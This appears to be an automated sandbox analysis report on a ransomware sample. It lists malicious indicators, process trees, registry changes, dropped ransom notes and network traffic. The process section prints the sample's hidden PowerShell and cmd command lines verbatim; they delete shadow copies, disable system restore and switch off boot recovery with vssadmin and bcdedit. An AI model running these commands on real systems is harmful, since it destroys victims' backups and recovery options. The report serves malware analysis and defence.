File name:

591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe

Full analysis: https://app.any.run/tasks/5661747a-afe0-4ade-952b-2d5c8e3afc3e
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: March 05, 2026, 16:15:38
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
ransomware
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5:

EB5D62F37C2A7CDD355B483D06FF7278

SHA1:

E21B853BD54E1305F3C0D0EB6F8DA52B70B0D722

SHA256:

591E7F5EB141C22919A406508F63A558E3BD732FE38844CEDBBEA938D666E78B

SSDEEP:

768:sAYQA+EJJ9P+3lGMU3vUDQM+pI3uRB/3qqB87pdMFtb8cmY11f3qrVBUoxygse3C:O+ElPnMwdO3uRB/6A8lCFtb8If6C

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Renames files like ransomware

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Runs PowerShell with an invisible window

      • powershell.exe (PID: 3388)
    • Using BCDEDIT.EXE to modify recovery options

      • cmd.exe (PID: 3656)
      • cmd.exe (PID: 8356)
    • Deletes shadow copies

      • vssadmin.exe (PID: 8604)
      • vssadmin.exe (PID: 8460)
      • vssadmin.exe (PID: 6952)
    • Resizes shadow copies

      • cmd.exe (PID: 8372)
      • cmd.exe (PID: 2900)
  • SUSPICIOUS

    • Starts CMD.EXE for command execution

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
      • cmd.exe (PID: 8892)
      • powershell.exe (PID: 3388)
    • Reads the date of Windows installation

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Creates a file in the system drive root

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Executing commands from a ".bat" file

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • System recovery suppression via bcdedit.exe

      • cmd.exe (PID: 8892)
      • cmd.exe (PID: 2248)
      • powershell.exe (PID: 3388)
      • cmd.exe (PID: 3656)
    • Application launched itself

      • cmd.exe (PID: 8892)
    • Escape characters obfuscation (POWERSHELL)

      • cmd.exe (PID: 2248)
    • Executes script without checking the security policy

      • powershell.exe (PID: 3388)
    • Manipulates environment variables

      • powershell.exe (PID: 3388)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2248)
    • Starts POWERSHELL.EXE for command execution

      • cmd.exe (PID: 2248)
    • Starts application with an unusual extension

      • powershell.exe (PID: 3388)
    • Executes as Windows Service

      • VSSVC.exe (PID: 9136)
  • INFO

    • Reads the machine GUID from the registry

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Process checks computer location settings

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Reads security settings of Internet Explorer

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Checks supported languages

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
      • chcp.com (PID: 7048)
    • Reads the computer name

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Creates files in a temporary directory

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7360)
    • Checks proxy server information

      • mshta.exe (PID: 7360)
    • Changes the display of characters in the console

      • powershell.exe (PID: 3388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:06:05 16:25:41+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 20480
InitializedDataSize: 42496
UninitializedDataSize: -
EntryPoint: 0x1b82
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 171
Monitored processes: 24
Malicious processes: 9
Suspicious processes: 4

Behavior graph

Processes in the graph, in start order: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe, cmd.exe, conhost.exe, mshta.exe, cmd.exe, powershell.exe, chcp.com, cmd.exe, vssadmin.exe, vssvc.exe, cmd.exe, vssadmin.exe, SPPSurrogate, cmd.exe, vssadmin.exe, cmd.exe, vssadmin.exe, cmd.exe, bcdedit.exe, cmd.exe, bcdedit.exe, cmd.exe, vssadmin.exe, slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1176
CMD: "C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin delete shadows /all /quiet"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 1908
CMD: C:\WINDOWS\Sysnative\bcdedit /set {default} bootstatuspolicy ignoreallfailures
Path: C:\Windows\System32\bcdedit.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptsp.dll
PID: 2248
CMD: cmd.exe /q /c "powershell.ExE -nop -w hidden -c $Sys64 = \"$env:SystemRoot\Sysnative\";$Sys32 = \"$env:SystemRoot\System32\";chcp 1251;IF (Test-Path \"$Sys64\vssadmin.exe\"){cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"};$Disks = [System.IO.DriveInfo]::getdrives() ^| ?{$_.DriveType -eq \"Fixed\" };Disable-ComputerRestore $Disks;$LogicalDisks = (GET-WMIObject -query \"SELECT * from win32_logicaldisk where DriveType = '3'\");If ($LogicalDisks -ne $null) {foreach ($LD in $LogicalDisks) {$Disk = $LD.DeviceID;Foreach ($LogicalDisk in $LogicalDisks) {$PrevVerEnable = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=401MB\";$PrevVerEnableUn = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=unbounded\";IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\$PrevVerEnable\";cmd /c \"$Sys64\$PrevVerEnableUn\"} ELSE {cmd /c \"$Sys32\$PrevVerEnable\";cmd /c \"$Sys32\$PrevVerEnableUn\"}}}};IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys64\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys32\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"}"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 2900
CMD: "C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MB"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 3232
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3380
CMD: C:\WINDOWS\Sysnative\bcdedit /set {default} recoveryenabled No
Path: C:\Windows\System32\bcdedit.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptsp.dll
PID: 3388
CMD: powershell.ExE -nop -w hidden -c $Sys64 = \"$env:SystemRoot\Sysnative\";$Sys32 = \"$env:SystemRoot\System32\";chcp 1251;IF (Test-Path \"$Sys64\vssadmin.exe\"){cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"};$Disks = [System.IO.DriveInfo]::getdrives() | ?{$_.DriveType -eq \"Fixed\" };Disable-ComputerRestore $Disks;$LogicalDisks = (GET-WMIObject -query \"SELECT * from win32_logicaldisk where DriveType = '3'\");If ($LogicalDisks -ne $null) {foreach ($LD in $LogicalDisks) {$Disk = $LD.DeviceID;Foreach ($LogicalDisk in $LogicalDisks) {$PrevVerEnable = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=401MB\";$PrevVerEnableUn = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=unbounded\";IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\$PrevVerEnable\";cmd /c \"$Sys64\$PrevVerEnableUn\"} ELSE {cmd /c \"$Sys32\$PrevVerEnable\";cmd /c \"$Sys32\$PrevVerEnableUn\"}}}};IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys64\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys32\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"}
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 3656
CMD: "C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\bcdedit /set {default} bootstatuspolicy ignoreallfailures"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 3796
CMD: C:\WINDOWS\Sysnative\vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MB
Path: C:\Windows\System32\vssadmin.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\vssadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
PID: 6900
CMD: "C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin delete shadows /all /quiet"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events: 9 553
Read events: 9 502
Write events: 31
Delete events: 20

Modification events

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\GNU\Display
Operation: write
Name: windowData
Value:
569CB5916C72B89B47B4B0141B7373C103F314B60ABAFEB28D1A769B3290F92FC0DC297BDE8AF119C4E0DF7BB950E880B7B8BFE9DC424E9715739D0C2F740F51E8C9784450C1441465B464A3758CBCEC4FACDB55CDE8B115

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value:
1

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value:
1

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value:
1

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value:
0

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation: write
Name: C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor

PID / Process: (7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation: write
Name: C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation

PID / Process: (7360) mshta.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectDraw\MostRecentApplication
Operation: write
Name: Name
Value:
mshta.exe

PID / Process: (7360) mshta.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectDraw\MostRecentApplication
Operation: write
Name: ID
Value:

PID / Process: (8636) dllhost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP\Clients
Operation: delete value
Name: {09F7EDC5-294E-4180-AF6A-FB0E6A0E9513}
Value:
\\?\Volume{2f5c5e72-85a9-11eb-90a8-9a9b76358421}\:(C%3A)
Executable files: 0
Suspicious files: 77
Text files: 59
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\admin\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\Public\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\BOOTNXT.FIXT | Type: binary
MD5: 3D72D45C643786A3EE705EB1385FAF9C
SHA256: A061F6BF4349E32E12A22723922C92EF2849F52880F88394D93DD137C5982BE2

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\BOOTNXT | Type: binary
MD5: 3D72D45C643786A3EE705EB1385FAF9C
SHA256: A061F6BF4349E32E12A22723922C92EF2849F52880F88394D93DD137C5982BE2

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\bootTel.dat | Type: binary
MD5: F2E7D6FA86E0EB0442208EDA9488FFB6
SHA256: 932FF3B72EF313CF4289162940A125278D1D6D3A1833B5C29A65B0AABFB2206F

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\admin\.ms-ad\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\admin\Contacts\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\bootTel.dat.FIXT | Type: binary
MD5: F2E7D6FA86E0EB0442208EDA9488FFB6
SHA256: 932FF3B72EF313CF4289162940A125278D1D6D3A1833B5C29A65B0AABFB2206F

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\admin\3D Objects\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4

PID: 7660 | Process: 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe | Filename: C:\Users\admin\Desktop\YOUR_FILES_ARE_ENCRYPTED.TXT | Type: text
MD5: AD9A93A93A3C387F3F63A97A9D927481
SHA256: 3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 15
TCP/UDP connections: 37
DNS requests: 15
Threats: 6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
356 | svchost.exe | POST | 404 | 20.190.159.68:443 | https://login.live.com/RST2.srf | US | xml | 341 b | whitelisted
2232 | SIHClient.exe | GET | 404 | 135.233.95.135:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | US | xml | 341 b | whitelisted
2232 | SIHClient.exe | GET | 404 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | xml | 341 b | whitelisted
2232 | SIHClient.exe | GET | 404 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | xml | 341 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | Not routed | - | whitelisted
7428 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
9080 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6768 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
- | - | 184.86.251.24:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted
3412 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4 | System | 192.168.100.255:138 | - | Not routed | - | whitelisted
356 | svchost.exe | 20.190.159.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6768 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7428 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.bing.com
  • 184.86.251.24
  • 184.86.251.27
  • 184.86.251.21
  • 184.86.251.20
  • 184.86.251.13
whitelisted
self.events.data.microsoft.com
  • 52.168.117.175
whitelisted
google.com
  • 142.251.143.110
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.4
  • 20.190.159.0
  • 20.190.159.64
  • 40.126.31.71
  • 40.126.31.2
  • 20.190.159.128
  • 20.190.159.130
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 135.233.95.135
  • 2603:1030:40c:16::565
whitelisted
135.95.233.135.in-addr.arpa
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted

Threats

PID | Process | Class | Message
- | - | Generic Protocol Command Decode | SURICATA STREAM suspected RST injection
3412 | svchost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request
3412 | svchost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request
3412 | svchost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request
3412 | svchost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request
3412 | svchost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request
No debug info